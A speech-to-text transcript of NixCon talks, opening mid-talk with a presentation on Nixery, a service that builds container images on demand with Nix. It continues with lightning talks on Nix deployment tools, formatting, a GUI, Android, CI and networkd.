nothing to do with each other at all. This was kind of my reaction. And a while back I already started thinking about whether or not there might be a better way to do this. Those of you who talked to me at the Nixcon in 2018 probably heard my ideas about the Kubernetes controller for Nix. I will get to that in a second. But also there have been other people working on very similar things for a while. There was an initial attempt, actually not an attempt at work to build a Docker image via Nix called just build image. That's in docker tools dot build image. And what that does, the way I understand it is it spins up a QMU, installs the things that you want in it and then takes a snapshot of that file system plus some extra information. That was the first idea for building Docker images in Nix and actually worked reasonably well. And then Graham C. Is he here? Somewhere he is. Maybe not in this room right now. Anyways, he wrote a thing called build layered image that I will be referencing a couple of times throughout the talk, which takes a more pure Nix approach to the construction of the layers. So instead of spinning up virtual machines and snapshotting their disk, it actually uses Nix to construct the tower walls themselves. Right. So about a year and a half ago I had this idea for what would the world look like if we didn't actually have to build these container images explicitly. And we just have some sort of content specification that tells us what we want in an image and the image is built based on that. So here's a mockup of something that I kind of prototyped in the beginning where we added an extra resource to the Kubernetes API. That's something that is supported in Kubernetes. You can see that up here. And then we had this simple YAML specification where each of the keys referred to a top level entry in Nix packages. And you kind of submitted this into your cluster and then a demon kind of ran in the back of the cluster, built an image out of this, pushed it into your registry and did this whole normal stateful kind of dance, but abstracted away for the user by just creating an image with this name. After building this, an interesting thing happened. So I tried to demo this to people. And it turns out that when you're demoing this, there's a lot of moving parts in it. You need to write a YAML file. You need to submit the YAML file to a Kubernetes cluster. Then a thing needs to run in the background and build the image and push it into a registry. And then Kubernetes launches pods that pull the image from there. So you've got six, seven things that can go wrong and they all take a little bit of time. So it's the kind of demo where you try to show it to someone. You make a few typos and they're kind of half falling asleep. And like, trust me, this is a valuable concept that I'm trying to get across. So I actually invented on the fly at some point this idea of a demo mode for the controller. So the idea here was that instead of having a specification pre-hoc of what goes into the image, we just use the components of the image to describe what should go into it. So there are kind of two main parts here. Just the host name, which is just the address at which Docker should look up the image that you're downloading. Then we've got a section that describes the packages. And the first ones in here are so-called meta packages, which is kind of a shorthand for sets of packages. So Shell, for example, gives you a bash interactive, IANA, Etsy, and like all these kinds of things that you probably want if you want a shell environment. And then you can specify paths separated other packages that should go into this image. So I built this demo mode, and then I realized that there's actually a much better idea than the first one I had. And then I kind of scrapped the actual controller, and I was just like, this is the way forward. Right. Before we talk about this slide, I'm going to start doing my first little demo just to show you what this thing actually looks like in practice. Okay. Microphone number two. So here's the public instance of Nixery. It's available at nixery.dev. And this is kind of like a public service that you can go and play with. So just to remember the... I can, I can. You don't actually need to read this. I'm just trying to show the logo as often as I can because I spent countless hours designing this, as you can see. So let's do a little demo of this. Here's the standard Docker CLI. What this command says. Is that readable enough? No. No? Okay. Excellent. What this says is we're going to run a container. We're going to attach a TTY interactively. We're going to remove the container after we're done. And then we will pull the image from nixery.dev and we want an image containing shell. So as per the previous slide, this is going to give us an image that just contains a basic bash environment in a second. So I need to actually tell it what to run. So here we go. Here's the bash. There are four utils and all sorts of things installed, but no additional programs. If I tried to run Htop, which I didn't specify in the image, it's not going to be included. So what I can do is I can exit out of this and I can edit it to include additional programs. Again these are just referencing keys in nix packages. And then an image is built on the fly and kind of sent to me. And now I have a shell in which I can actually run Htop. So that's the basic mode of operation. In this public instance that's running at nixery.dev, I track whichever is the latest nix-res channel and I do updates for this roughly once or twice a week. But it turns out that what's actually a much more interesting use case than just having a thing that can give you these arbitrary images at Hoc is the ability to add your own private services into it and see how this can be useful for CI and organizations. So there's something I have to show. I personally am a monorep of personal and here is the default of nix of my personal infrastructure repository. It contains stuff like my blog and so on. And this is mostly standard nix stuff. So there's nothing like super interesting to show here. I import nix packages from a pin commit and then I have an overlay that overlays my standard packages on top of it. If you want to know how this works in detail and have discussions about pinning channels and so on, we can do that after the talk because it's a slightly different thing. Anyways, in here I have a thing that I built which is the nix-con demo using nmateers. Where is he? Also somewhere. Excellent Nash which builds Rust based on lock file specifications. Huge fan of that. And I wrote a tiny, that's the wrong one, I wrote a tiny demo which just looks like this. This can either run as a web server showing me this nice message. I hope for the Czech people here that I spelled that correctly, trusting the internet or run with the CLI argument. It doesn't really matter what this program does. I just want to show you that there's an actual thing going on here. So I'm importing that into my nix package set and then I have it available in my overlay of packages. So down here I have a shell in which DRNV has just, thanks to Zimba, has just loaded some environment variables for me. And one of them is the one called nix-ery packages path. So I support multiple different sources for importing package sets into nix-ery. And one of them is using git repositories and one of them is using local file paths. In this case I'm just using the file path of the checkout of my repositories. I'm telling nix-ery that the package set from which I want you to build images is the one I have at this place on my disk. So what I can do now is I can go and spin up a nix-ery in here, which looks like that. And then over here on the other side, I can do the same thing I was doing before with my shell. But instead of pulling from nix-ery.dev, I'm pulling from localhost. So this is the local instance I have running. So this one wasn't particularly interesting because it was cached already, I think. But yeah, I just want to show that there is nothing in here right now. So there's no program called nix-condemo. Now I'm going to remove that image just to prove to you that I'm not going to try and hit any caches here. I don't actually, ah, what help if I could spell? I don't have it even. So then we can go and run this command again and add this one to the image. Here we go. Could not find nix package. Thanks. Here we go. Okay. So what was supposed to happen is that I pull an image down now and it contains the binary that I've added here. Quick show of hands, how much time should I spend working on getting that demo up and running versus not? Okay, I'll give it 20 seconds. So that looks correct to me. And then here at the top somewhere. Yep. Ah, okay. It's just called nix-con. Here we go. Right. And now I have my nix-con demo thing in here built from the package set, overlaid into my local configuration. Cool. So that works. It actually turns into kind of interesting way of deploying services because in the configuration mode where I let you specify git repository instead of a file path, I can translate tags into git commits, which we'll see in a bit. And then you kind of start getting the ability to build CI pipelines out of this. Before I show that, I want to talk about something that I spent way too much time on. As a sort of premature optimization, but it was an interesting thing to go through. And this is something that Graham kind of kicked off when you started building build layered image. For historical reasons, Docker has a maximum number of layers that you can have in an image. It's around 125 for some reason. And it turns out that even using up all of those is not a very good idea because you share this layer restriction with your user. So if you have users that want to pull an image and extend it by adding additional files, you count if there's already 125 layers in the image. So Graham had this initial idea of creating a graph of all the dependencies that a given image needs and then counting the popularity of individual things inside of that graph. So if you have more than one derivation that references something like G-Lip C, then G-Lip C becomes more popular and eventually you sort by this popularity and kind of pick the most important ones from the top and hope that those are going to match. But in this case, you have a maximum of one derivation or one closure per image layer. But there are many situations in which some kind of thing depends on, let's say we have a program called foo and it depends on foo data. There's never really a good reason to split foo and foo data apart from each other. We want to actually put them in the same layer and make sure that we get kind of optimal caching here during the builds. So I'm going to walk you quickly through how that works and there's a more detailed write up for those of you that like graphs. Right. I suspect that some of this is not going to be readable all the way from the back, but I'm going to very quickly talk through this. So I had to find something that doesn't have a whole lot of dependencies to actually demo this. My initial attempt was to use git, but git depends on literally the entire universe and every single Perl package that exists. So that's a lot of packages. What we have here is you see a blue node at the top that's called the image root. And then there's a few arrows that go from that to the top level of this graph, which are images, which are packages that the user requested. Specifically here, there's htop and there's nano and there's a shell somewhere and that's kind of it for this image. Actually nano is part of the shell alias. And then if we look at this, there's a few interesting things in here. So for example, Perl is only referenced once by the more utils from up there, but Perl itself actually turns out to be a very popular package. There's a lot of things that depend on Perl. So we would like to use this information and kind of make sure that Perl ends up not bundled together with more utils. And similarly we can see that glip see is extremely popular. It's got a lot of arrows going into it. So what I started doing at this point is together with a few people in IOC and also at work, we devised an algorithm for counting the popularity of all packages and NICs packages by just checking how many runtime references there are to any given derivation and then creating a kind of popularity metric by multiplying that with the size of the closure so that we can get kind of the best hash hit performance in terms of data transferred and whatnot. So the way this works is that the red ones here have been identified by NICS-R-E as popular packages and we go and we draw extra edges from the root to those popular packages which in the case of Perl, for example, now means that there are two paths going into Perl. That's the red one up here. And then we create what's called a dominator tree of this, which is a relay outing of a graph into a tree in which every node is preceded by the ones that all paths to it must pass through. If that was confusing, the Wikipedia article will explain it to you. That ends up looking like this and suddenly we have a very ordered graph of how these things look. So we have the image root and then we have a top layer which actually matches very well with the images, the image layer so we would like to stick into the same table. And then stuff like more utils which depends on some of these not very popular Perl libraries and relatively speaking to the rest of the ecosystem anyways. And we can bundle these together into the same layout. So once we get to this point, we can calculate the ideal layer layout which looks like this and then based on the budget we have available for layers, we can start merging the least popular things together. And then we actually get pretty good build caching out of it. Cool. Does this make sense so far? Does anybody would like to inject a question at this point? Right, let's move on. So what about image tags? One component of image names I didn't mention before is this yellow one here at the end. It's the image tag. For Docker this is commonly versions that people add to things. So they will have something like Ubuntu, colon and then an Ubuntu release version or whatever. But I realized that we can actually use this information and map it onto something else, specifically Git commits. So if you're pointing nixery at the public nix packages wrapper, you could use this to get arbitrary references like specific channels or specific commits. If you're pointing it at a private repository, you can start having your CI substitute these parameters and then you can use this as your deployment strategy. So to quickly show that, I will show you a demo involving Kubernetes and this is going to be the one that will definitely fail. Wish me luck. All right. What I basically want to show first of all is the deployment manifest for my blog. So my blog, which most of you haven't read and I don't really post to it, so whatever. But it's an interesting experimental playground for new technology. I have this Kubernetes manifest that deploys the blog. For those of you not familiar with Kubernetes, most of the fields in here don't really matter. It's just a kind of verbose thing. The primary line in here is this one here. It specifies the image to run. I'm going to zoom in a little bit just to make sure that people can see this. Where what's basically going on is that I'm pulling an image from nixery.local, which is a private DNS name pointing to a nixery instance running inside of my cluster. How to do this is something I'm currently writing documentation for. So people will be able to start doing that on their own very soon. And then I want the attribute task gen.blog, which is the derivation for my blog. And I specify the version as githead. So this syntax here is from a templating tool that I use called contemplate, which basically just inserts the current git commit of the repository that you're in. Right. So what I can show you at this point is I can describe the deployment for my blog in Kubernetes. I'm live speaking to the Kubernetes cluster in which I deploy my personal things. And we can see that the image is currently some commit in this git repository. I can take this commit and look at what it is exactly. And I know that this is the one on which this particular image was built. So to do something a little interactive now, I have spun up the nixery inside of the cluster. Here's the live.log stream from nixery. And I'm going to, first of all, run a container inside of Kubernetes and attach to it interactively. And then we will do something more interesting. So the way this works here is syntactically very similar to Docker. So if you saw the previous command and understood it, it's pretty much the same thing. We're running a container. We're attaching a TTY. We're doing this interactively. We're giving it some randomly generated name because they don't want to conflict. We're not restarting it. And we're pulling the image from nixery.local slash shell. So it's just going to give me the standard bash environment. If I run this down here, I will see that a demo container is now creating. And after a couple of seconds, I get the shell out of it. Cool. So there's nothing in here as before. There's no extra commands. I'm not going to demo Htop again. Instead, I'm just going to let you know that this nixery instance is pointing at the repository I was showing you earlier. So I can actually go and pull the nixcon demo that I was showing up for a second into this instance and deploy a container with it. I'm just going to go ahead and do that for talking too much about it. And now we should start seeing messages from nixery here. So let me just make sure that this stream is not dead. Yeah, here we go. So there's now a build happening. And if domain is doing its job well and cache access up and running, then this should hit the binary cache. If it doesn't, it's going to be interesting because this is a Rust thing and the Rust compiler is not the fastest one. And then I'm probably going to end up in a situation like yesterday with the Haskell demo. So let's give it a moment and see what happens. Actually on the topic of caches in this case, what I found to be a very effective way of working with this is having a CI set up on your system that populates the binary cache, something like cache x on every push so that all the things are already pre-built when nixery tries to go and fetch them from a binary cache. Nixery can in theory go and start building everything from scratch, but you probably don't want it to be spending a couple of hours building your Haskell services. So it's nice to have that done already when you get to the point of deployment. What we're interested in here is not necessarily having everything pre-cached on an image level because we want to be able to dynamically modify what goes into an image, for example, by adding debugging tools, but it's still nice to actually have offloaded the caching of stuff like your actual service builds to nix. Okay, here we go. The nix build is done. A bunch of stuff happened under the hood, and now we have a command prompt here that should actually give me the nixcon demo. And now if I forward... Let's see if we can get this to work. This is the one. If we forward something like port 42, 42 into this container, then I should be able to... Right, that demo worked. I'm surprised. The trivial first one. That's how it always goes. Cool. So Kubernetes is pretty much one of the ideal ways of using this in production, and it's kind of based of the origin of the idea where this whole thing came from. And the deployment of Nixery into a cluster is relatively simple. Like I was saying, this is going to be documented on my page. You basically just run a nixery instance and add some environment variables to configure it. There's nothing really special about it. The one restriction that is in place at the moment, simply because I don't have time to implement support for everything, is that this only runs on Google Cloud Platform right now. There is a mode coming up for just being able to use a local file system instead of serving image layers from our storage system. And once that happens, you can actually run this anywhere. Also contributions welcome if somebody wants to implement that. The issue tracker describes how it should work. And once you have that up and running, you can create these kinds of things to solidify the deployment infrastructure using this service. Right, that's kind of the primary thing I wanted to say. Here are my contact details and where to find source code and all that kind of thing. Yes. And I want to say thanks to Sarah and Ida for coming up with the broccoli alias, which we kind of picked up late yesterday evening. Right, questions. So, two questions. First, in the URL, you specify the path and you specify packages or the versions using slash. Yep. Did you try to, or did you consider using NIC's expressions there? Yes. The primary issue is that there are restrictions in the Docker registry protocol in which characters are allowed and it's quite restrictive. So for example, an interesting fact, there's an issue on the issue tracker about this. You cannot have uppercase characters in there. And NIC's packages has things like Haskell packages, which is an uppercase thing, but you might want to refer to packages inside of that that are actually binary. So what I did is I tried to do a first lookup with the exact name that the user specified. And if that doesn't work, I normalize the casing of all attributes and then do a lookup with that. And some of you are probably guessing this right now. Yes, there are name clashes based on casing inside of NIC's packages. Fortunately, at the top level, this only affects things that are actually aliases for each other, but inside of Haskell packages, there are actually different pieces of software with names that are only different in the casing. So for those, I just don't have a solution at the moment. If you need one of those, I don't know, make a private wrapper on aliases, it's something sane. With the original Kubernetes controller idea, I also considered adding a field just to straight add a NICs expression in there, but since that idea has kind of been dropped, I thought that it's probably more reasonable to actually keep those in the NICs repository rather than inside of the deployment manifest. Okay, thank you. And the second question will be, how do you set up private Git repository with it? Lastly, I'm interested with the keys. So I'm using the built-in fetch Git functionality to fetch the repo, and built-in fetch Git uses the SSH configuration of your environment. So it's impure, which means that as long as the environment in which Nixery is running is configured with appropriate SSH credentials, then everything will just kind of work. Thank you. Cheers. All right, anything else? Yes, I've missed that bit, but I wonder, Dockerfile has a lot more to express like mount points, X-X, whatever. Is that handled with Nixery, or do you have to build some kind of command line on that? So at the moment, most of those things, because they're kind of only metadata outsourced to Kubernetes, so you specify stuff like the entry point inside of the deployment manifest. There is an effort in progress in Nix packages right now to add metadata to every derivation that contains binaries that tells us what is the primary binary in this package. And once that is in place, we can actually automatically generate entry points. But then there's also a discussion of if somebody writes shell slash engine X slash n grog, which one do they actually want to run? So at some point, you still have to defer to the user. As for environment variables and that kind of thing, in theory, the Nix builder that we have to do this kind of stuff supports them, but there is currently no surface in the API where you can actually attach that. We might come up with something later. There's a few issues about related things on the tracker. Feel free to give some input. Other examples of other meta packages besides shell? And what can you do with those meta packages? So shell is the only one that the public instance supports at the moment. The next one that I'm currently working on is RM64 to serve your RM64 binaries. The thing with that is that the Docker registry protocol has sort of support for switching architectures, but it does it in the form of serving you one manifest that contains hashes for all architectures. So if you were to use that functionality, you would have to build all things for all architectures on every request, which is probably not what the user wants. So I'm thinking that meta packages as the first element are kind of a more sane way of toggling that behavior. All right. Thank you very much. Thank you.
Nixery builds container images on-demand via Nix and serves them via the standard Docker registry protocol. In this talk we look at how it works, which implementation challenges came up and how it is useful in the so-called "real world".
10.5446/50701 (DOI)
Let's get rolling. We have about five of them, I think. The first one is Tomas with his next cluster. Hello again. So I deploy a lot of servers in one of the companies I'm helping with, we shareably. We have around 1,000 hosts, which is relatively fine. And I use different kind of tools. I use Nixops, I use Terraform, CloudFormation, whatever crap is on Azure, and all those Google services. And they have some issues. So the big gray box is just a tool, right? And it has fixed logic for quite a few components. One of them is fine. And for me, especially the rollout or deploy strategy, which is hardcoded into those tools, it's really, really crap. I have a lot of environments which are completely different, right? So first of all, they have hardcoded abstractions. I cannot create my own abstractions. Or maybe Nixops is a little easier, but still. The deployment strategy is fixed. Sometimes it's parametrized. You can do parallel or sequential. But can you inject your check for the database? Like you want to roll out your database, you have 40 servers of Cassandra, and you want to do one by one node. And it takes like two days. Those tools are really not good for that. And they are really buggy. Anybody use Terraform? Like, hell, right? So there is few, few more. Sometimes you want to extend your tool. And it's not always easy. The state file is like another idea. This concept should really die. And there is more books everywhere. So the idea would be to shift this tool into library. So now the gray big box is our own tool. So basically, we use the pieces from other libraries to build our own stuff. Of course, that makes it a little harder because a lot of glue and error handling is now on our side. But that's not that bad. We can minimize it. And we can try to figure out how we can minimize that and make it better. So what that gives us if we switch from the framework to the library approach, right? We can integrate new abstractions faster. We can describe whatever we want in the language we want. We can put our own rollout strategy. We can not use state file. And we can integrate other clouds or cloud resources much faster than tools. The tool is there to make the pull request proper testing. It's like at least a few weeks or months. And then you have to fork it or something, right? So if we have different kind of deployments like Cassandra or Elasticsearch, sometimes you want the restart cluster all node at once. Sometimes you want to deploy sequentially. Sometimes you want to have a health check between deploying services. Sometimes you want to just build an AMI and change the cloud formation parameter just to update the auto scaling set. And you really don't care about deploying through SSH itself. Like there are different methods and those tools are not supporting them at all. So if we have those libraries, then we have a lot of glue on our site for error hand links and logic. So how we can make it a lot more efficient. So the error site is a little simpler. So as you see in both cases, the user test coverage is the same, right? We have little less coverage for testing tool, sorry, for the tool. But the user coverage is the same, which is basically I have the input and what is the output. Is the rollout done completely well? So the error is fine. We write our test case for that. And we are, if we want to switch from that tool, it is already done. So how we minimize the glue and the logic. So I wrote those two libraries. They are really crap. But I will be developing them for another weeks. So hopefully it will be usable. So the idea is to develop bash tools really, really fast. There is few libraries like that already. So probably you can use them if you prefer. Basically I am demonstrating the concept only. So it is similar to Git, right? You have whatever CTL or admin tool. You have sub commands. This is the main application. You define just description and main and that is it, like the other scrap. And here you define the comment number one. You define four options. You define description and you run main. And then your logic for your cloud is just one line here. But I will demonstrate it in something more cool. So that was library for bash to produce CLI interfaces quickly. And now Nix cluster. So this is just a set of functions, mostly bash, like this, where you have something specific sets of requirements you want to deliver. So in this case you have Cassandra and Docker and you have NixOS on VSH. And then you have everything inside. And you can use them. You can develop your own. Those files don't have more than like ten lines of code. See reusable. So how we want to implement stuff, for example. We have our main command, which is in this example the first one. And then we have sub commands later. Okay. So we have some implementation details here. So how we do that? Okay. So this is probably the most important stuff. We write one command. We have four options, like name, node ID, Nix expression, SSH private key path. And then we source the implementation in the last line. And the implementation is really just a few lines of bash which does the job. So instead of using Terraform or whatever, let's use AWS CLI, Azure CLI, Google CLI to deliver the cloud bash on local. The tools that are working, they are mature that are delivered by integrators and don't produce much code, make it as simple as possible and use libraries instead of frameworks. Thank you. Next up is Lash Jellema with what makes a Nix format. I would like to remind lightning talk speakers to please keep track of the timer over there. Don't run over time. Is this one on? All right. So hi, I'm Lars. I'm known on GitHub as Lucas 16. I work at Seroquel. And Seroquel asked me about eight months ago to create a form for Nix as there weren't any good form letters back then. So I went out and did that. That was my task. And I had to wonder how do you build a form letter? So I started with just a parser and pretty printer. And then I had to wonder how do you determine the rules and how one stuff is pretty? So obviously you first look at the common practices, but there are still multiple styles used. Not everybody uses the same style. And there's a few choices you can make. So one is to do very specific conversions. So you just keep all the formatting that is in the original file. You fix up specific parts of ugly that you don't like. And this doesn't change too much. So you have more control. But you also need to spend more manual effort to format the file because it doesn't cover all cases. So you might still end up with mixed formats from different sources. And what this means is that the output is very consistent when you make edits to your source file. But the output is not as consistent between files from very different repositories. So the other approach is total conversion. So you throw away all the formatting that was in the original file and then you take a top bound approach. You start formatting everything from scratch, which is the approach I've taken for next formats. You might have heard about it. So this forces you to implement formatting for everything. And that also means you no longer need to think about what kind of, you no longer need to do any manual formatting. So you can just fire and forget it. And the advantage of that is that it's consistent based on the input. So if you have files from two very different developers that look similar, all the codes will look familiar. The diffs might get a little larger because of that when you edit files. But there are ways to get around that. You can ignore white space with getdiff and it won't be as large. And the reason why this is actually doable in Nix is because Nix is a pretty simple language. And so there's few enough cases that you can actually get good formatting for all of them. There's also something you have to think about, which is clarity versus prettiness. So it's very tempting to make every piece of code very pretty by aligning all the assignment operators. But that also takes a lot more work because a computer can't always guess what's ready for you. But it can understand what is clear. So when the code is, I'll give an example actually. So in our expressions, the pretty printing library I used originally, which is used mostly in Haskell, it does this. It does the one on the left, the bad part. So it really wants to fit as much as possible in a small space. And it will actually split the inner expression, which is just a call rather than doing what's on the right and splitting on logical parts of the expression. So I prefer that. And that's why I had to change the pretty printing algorithm from the standard one in Haskell. And actually, what I like the best is this because the operators and the keywords are on the left and you can more easily scan the code. Yeah, that was pretty much the entire talk. So thank you all for listening. And if you have any questions, please come and see me after the lightning talks. I'd love to talk to you. Thank you. So next up is Yuya Inchatsuki with NixGui, visualizing Nix Scope and Store. Hello, Nixers. I want to talk about my project, maybe not even a project yet, but idea for Hackaday, although there is already some amount of working code and working application. So when I started using Nix and diving deeper into the language, I thought it would be a good idea to write something which would make this task easier for others. And the more ambitious goal is to make something which could be usable as an installer. So because I'm mostly familiar with Python and QT has better multi-platform reputation and it's also not hardly bound to graphical interface and I hope it is possible to reuse models for something like N-Carses. I have chosen Python with QT. So what should it, what the GUI for Nix should look like? So I think users would expect some kind of tree visualizing the scope, the attributes and allowing to read the descriptions and set values. And here is what Nix has. So there is a flow and there are a few problems about this because, for example, there is no such thing as canonical path in the scope because one thing can be accessed via multiple paths which is used a lot in the scope and it also pollutes outputs of Nix search a lot. So you can see in search results, for example, just Nix back against VLC and something like Nix back against Leaps for QT VLC and it's the same thing and when you are new to Nix it makes quite a confusion. Then there is a result of computation, derivations and output paths in the store and this transition is, in fact, irreversible. It's a problem maybe that we cannot get the state of the scope which produced the current profile and I have started with the store browser which can currently be used to choose some profile or exact store path and see the dependency tree and different information about store paths and there is also some prototype for the scope browser which uses Nix evaluate to list attributes and parses the JSON output. I don't yet have a good solution for this but the idea is maybe we should just ignore... Okay, I will be finishing. If somebody, a few have strong experience with QT it would be nice to have a talk maybe to verify that my approach is good enough. Thank you for your attention. Next up is Marek Mahout and I believe you are going to talk about Morph. Okay, thanks. Hello everyone. My name is Marek Mahout and I am working from a company called Satoshi Labs. You probably know Satoshi Labs by the company behind the first cryptocurrency hardware wallet called Trezor and today I am going to show you how we are using Morph for our configuration management of our Nix instances. Before I jump in, can I just quickly ask how many of you are familiar with Morph? Can you raise your hands? Okay, so a lot of people, that's good. What is Morph? I really like the project description which is just a fancy wrapper around the tools we are already using daily. The features, if you compare to the system is multi-host which is probably given. It's stateless so compared to other configuration management tools such as NixOps you don't need to store the state of the infrastructure which is really nice if you are working in a team. It has built-in health checks so after each deploy you can verify your infrastructure is running as expected and it has built-in way to manage your secrets out of the Nix store of course. You can get it on this GitHub URL and it's of course in Nix packages so you can install it directly. Okay, so this is our directory structure for our Morph configuration. If you are familiar with Puppet, you might be familiar with this as well as we brought some ideas from them. The main file which is called by Morph is infra.nix and in this file we actually just import all of the files which we call profiles. So each server, each instance has its own profile. In this profile file we store information that are specific to the host itself so things such as IP address is host names but also hardware configuration and most importantly each of the profile files includes a number of roles. By roles we are defining we can have a common role where we define something for all of the hosts such as our default package set for example but each of the profiles has a role specific for its function. In this example we have the role database that is directly linked to this profile. The roles are actually built from modules so each role is using any modules in this example Nginx and we are also having a number of secrets. We are using Git Crypt to manage our secrets so it's actually encrypted on the remote Git server but we can work with it just like a plain file. The workflow is really simple. We just execute Morph build to build all our derivations for all our servers. The Morph push will just copy the closures to the remote servers and then we just deploy switches which means it just switch the configuration on all of the instances. Interesting thing here what it does after the switch is complete is also running the health checks and in case any of those fails it is executing a role back so we don't have much doubt and we know how to fix stuff. And last command we are using most often is to upload the secrets so what this does is just take all the secrets and just plainly copy them into place leaving them out of the Nix store. It restarts any services that may be dependent on those files and lastly it's around the health checks against to see if everything is all right. Okay so that's all. Actually I have something left. That's good. So that's all here are the demo files and you can catch up during the lunch if you want to talk more about Morph. I was really hoping we get like a full Morph presentation but sadly the developers did not submit the talk so maybe next year we will get that. Thank you. So next up is Alexander. I don't know how to pronounce his surname so I'm not even going to try but he's going to talk about running Nix on Android. Hello. Hello. For all of you who have found yourself staring at your Android phones and thinking okay I want to try running my familiar Linux stuff there. You don't have to go full semial. You don't have to go NixOS mobile route. There are other approaches and other distributions pioneered way earlier than us. You can also go hardcore. You can embrace Android not dish it but recompile all your disk too with Bionic that means porting everything to a different Lipsy. I think that's hardcore but Termax does that. Good luck to them. You can also get root and hammer your Android installation as hard so it will start resembling your disk through more than Android. That's also always an option for power users. And you can go an easier way and just use user space to emulation and I want to tell you that sometimes the lowest hanging through is the ripest one. I'm going to skip all the details. I will upload it somewhere and you will look it up later if you want to. I wanted to frame it as a story. This spring I wanted a lightweight travel laptop. I didn't like anything that I could buy but I found a nice Android tablet and I thought why not a tablet. I don't need much from my travel device but there was a lingering question. Could it run Nix? I did a quick Google lookup. I didn't find it definitive. Yes, I found a lot of people with a lot of problems compiling Nix under Android but I found this command and it's pretty inspirational. This would turn toys into semi-computers. I love that one. But if I'm paying for a tablet I want a tablet. I want to use Android apps. I don't want to wait until GNOME catches up with the user experience. I also love my hardware working. So I wanted Nix to coexist with Android. I also just read excellent posts but made you borrow about static linking and cross compilation and I was like wow, I know what I got to do. I should just cross compile Nix and statically link it on it and it will work in Android. So I was pretty stoked. I bought the tablet and I remember myself thinking vividly that would be super cool if I had a working prototype before Nixcon, right? Yeah. And I got it working the same evening. The biggest problem was that I had to understand first that I don't need to do anything. If I have P-root I can just rewrite access to Nix store so it looks like it is located in actual slash Nix slash store. And I also thought okay, I should now sit down and build a root of S with everything required to run Nix and it turns out we have one and it's called Nix Release Star Bowl. And I downloaded it. I P-rooted into that and it worked. Wow. So this is kind of like a testament to thank you. It just works on Android. Plain overall limitations. At first it was a very hacky bash script that did everything with an intermediate distribution called Termex but then I cut out the middleman. I forked the app so it could run Nix directly. I started cross compiling P-root the right Nix way. Then I kind of thought okay, it just works for me and I stopped working on that. And then one day I get a PR that rewrites my project. I mean, some lines survived but that was read me MD so it doesn't count. So thanks Gershly for rewriting everything. It's now properly built with Nix and all the hacks that I installed on device in his second PR he also put it under Nix control and users now have an upgrade path that is not wipe all data and reinstall it. That's wonderful. And I also just got it accepted into FDroid so it should be in their build queue now. Fingers crossed so try it from Android next week. For now you can try my APK if you want to. What gives? You can install an application. It's a terminal and a liter. There's a terminal. You can Nix run something. You are encouraged to install home manager. You don't have to compile stuff. Hydra has our AR64 binary cache. It will just get downloaded and you don't need root. You don't need username spaces. You don't need a Linux, permissive, whatever. You do need a 64-bit phone or tablet because we don't have Nix built for 32-bit arm unfortunately. It would be slow and PRoot isn't exactly helping that. And there are some restrictions like everything that uses ptrace won't work because PRoot took that. And remember that you are running stuff as an unprivileged user under another Linux distro and it's not Fedora or Debian. It's Android so everything is messed up. So don't try fancy stuff like top or maybe pink. That won't fly. But other tools work just well. I have my favorite tools there. I've type set this presentation on my tablet. I compiled it with Pandoc. It works. So semi-computer I think. And all my Android experience is still there. My Wi-Fi works. I really value that. But I think there's also a bigger question. What do we want to do with that? I think we have a quirky platform under our noses. It's quirky but it's pretty uniformly quirky. And it's already in our pockets. Maybe it's the next Nix Darwin but we just didn't explore it enough. I don't know why we didn't do that. And you're not allowed to ask questions but I am. So could we make my project that had more official? I want a fancy looking hostname for my files or something. Could I maybe recompile everything that would require a lot of builders and whatever but this could get me out of P-root and what's the actual end game? And is it worth the effort? I don't know. So please find me. Ask me or better answer those. Thank you. I've actually built my crazy e-max config on this stuff and it works just great. But next up is Domynkosa and he's going to talk about Hercules CI. Hey everyone. How are you doing? All right. You're still awake. Let's see if this works. So I'm hijacking this talk a bit. I'm sorry for three topics. Let's see if we can get. Please. All right. This might work. All right. So first of all I want to briefly mention Nixxs Weekly. It's like a weekly newsletter that's actually a monthly newsletter that goes out when I have time. But you should either subscribe for news or there's a link somewhere at the bottom of each post where you can send your blog post or whatever you have done with Nixx. So it's featured there. And I think there is about almost 1,000 people right now subscribed to it. So it's pretty wide. I mean you can get a nice audience and you can see a bunch of posts there. All right. So getting to my third topic with the second one. I wrote like a couple of a year ago, Cachex, which is a hosted binary cache, easy to use. And I don't know if you heard, but GitHub launched their CI. It's called GitHub Actions. So there is a Cachex action. If you need to start really, really easy with Nixx and a CI, basically you call it is file into your repo. You set your keys for Cachex and you're building Nixx and Cachex in like 30 seconds, which is pretty nice to start a simple toy project. And to my last topic, we're also building a complete CI replacement for Hidra. So who is running Hidra? All right. My condolences. I offer also emotional support after the Nixxcon. But besides that, you can also use our CI that we've been building for the last year. So I'm going to quickly show how it works. So you can click here. You can say Hakel CI and add a repo. So you can whitelist which repo is built. So let me just show you there's just one file in it. It's a bit cryptic, but you can build Linux and Darwin with this simple expression and it's built a hello world derivation. So nothing too fancy. So if we edit now and it loads, we can start building our project. So let's see where it is. All right. So if I push it now, we should see it. Evaluate and build. There we go. And there you go. So it displays attributes as they're being evaluated. And now it's going to dispatch this to Linux and Darwin and build them. So yeah, that's a very simple demo of it. The agents themselves need to be hosted by you on different infrastructures. So we provide serve for Nixxops, Nixxdarwin and probably other things. So we're aiming to make it as simple as possible to deploy those without scaling in the future and so on. And if you go to docs.hercules-ci.com, you will see instructions on how to deploy those agents. The service is hosted so you don't have to maintain it. Only the agents. It's free for open source. So you can, if you have some hardware or even on your laptop, the agents are completely stateless. So you can just run it on your laptop and when it's online, it will build things. And otherwise, it's a paid service for private repositories. And yeah, it's a bit busy with other things right now. We're rebuilding huge Haskell sets. So yeah, that's it. If you have some questions about Hercules-ci or Cachex or even Nixxops, talk to me later. Thanks. Thank you, Domen. Next up is Franz Plats and he's going to talk about NetworkD. So hello. This one is going to be quick. Just a few, like, what's the current state of NetworkD? Because I did a talk at last Nixxcon about switching the default networking back into NetworkD. But obviously, that hasn't happened yet. And quite a lot of people came up to me at this Nixxcon to ask about the current state. So I'm going to do a lightning talk about it to inform you what has happened and what's going to happen. So what has happened? Not that much actually because due to a lack of time on my part, but also what we already did is for 1909, we deprecated the use of networking.useDHCP and NetworkD. So it's not possible to do DHCP on all interfaces anymore if you use NetworkD because that's inherently incompatible with how NetworkD works. What we also did is we modified Nixxos generate config to not enable use DHCP by default, but only enable use DHCP on an interface basis. So only for interfaces that are available on your system when you installed NixxOS, use DHCP will be enabled. What's currently on master, what Fluctlit actually did, we also removed the 99-Schmain network unit which was causing the main part of the trouble for every like NetworkD user and like most NetworkD users out there disabled that unit actually. And so the reasons why it's not ready yet, it's actually more work and like more questions arose than anticipated when I did my talk. And there were some people who came up to me after the talk that still wanted to keep using scripted networking. And that's a problem because 